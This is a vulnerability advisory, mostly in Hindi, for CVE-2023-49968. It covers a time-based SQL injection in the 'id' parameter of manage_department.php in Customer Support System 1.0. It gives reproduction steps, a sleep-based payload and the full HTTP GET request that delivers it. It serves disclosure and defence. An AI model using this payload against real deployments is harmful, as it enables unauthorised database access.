
ग्राहक सहायता प्रणाली 1.0 - manage_department.php में "id" URL पैरामीटर के माध्यम से SQL Injection Vulnerability
विवरण: Customer Support System के संस्करण 1 में एक SQL Injection कमजोरी मौजूद है। एक दुर्भावनापूर्ण इरादे वाला हमलावर विभाग को संपादित करते समय 'id' URL पैरामीटर में हेरफेर करके MySQL डेटाबेस पर SQL कमांड निष्पादित कर सकता है।
कमजोर उत्पाद संस्करण: Customer Support System 1.0
CVE लेखक: Geraldo Alcântara
दिनांक: 28/11/2023
पुष्टि की गई: 19/12/2023
CVE: CVE-2023-49968
परीक्षण किया गया: Windows
1- एप्लिकेशन में लॉग इन करें।
2- विभाग संपादन पृष्ठ पर जाएं, 'Action' बटन पर क्लिक करें, और 'Edit' चुनें।
3- 'id' पैरामीटर पारित किया जाएगा, जिससे दुर्भावनापूर्ण पेलोड डाला जा सकेगा।
payload: (select*from(select(sleep(5)))a)
GET /customer_support/manage_department.php?id=(select*from(select(sleep(5)))a) HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=department_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n
खोजकर्ता/श्रेय:
Geraldo Alcântara